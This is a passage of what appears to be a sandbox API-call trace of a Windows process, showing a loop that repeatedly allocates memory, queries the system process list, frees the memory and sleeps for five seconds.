BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.461] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.476] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.493] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.505] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.508] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.525] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.539] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.554] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.586] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.603] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.613] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.617] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.630] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.632] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.648] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.680] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.695] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.711] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.727] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.741] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.759] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0163.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0163.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0163.772] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0163.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0163.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0163.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0163.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 